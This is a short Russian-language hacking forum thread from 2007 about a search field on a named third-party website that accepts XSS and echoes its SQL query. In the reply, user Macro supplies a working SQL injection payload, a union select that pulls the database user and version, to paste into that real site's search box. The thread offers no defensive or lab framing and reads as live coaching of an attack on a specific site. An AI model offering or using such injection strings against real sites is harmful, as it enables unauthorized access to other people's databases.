Не пойму, что за уязвимость

Discussion in 'Песочница' started by inlanger, 7 Dec 2007.

Thread Status:
Not open for further replies.
  1. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    985
    Likes Received:
    283
    Reputations:
    27
    Вот страница:
    http://u-office.utech-online.com/u-map/index.php
    поле поиск кушает любую XSS, что ему дать
    И какого-то хрена выдаёт весь SQL запрос:
    SELECT * FROM `prod_umap_obj` WHERE `name_obj` LIKE 'Ваш поисковый запрос' AND parent_id_object != 0

    это типа баг? или это так надо?
     
    #1 inlanger, 7 Dec 2007
  2. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Это баг+дебаг. :D Вставь в поисковый запрос
    Code:
    фыва' union select 1,user(),version(),4/*
     
    #2 Macro, 7 Dec 2007
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.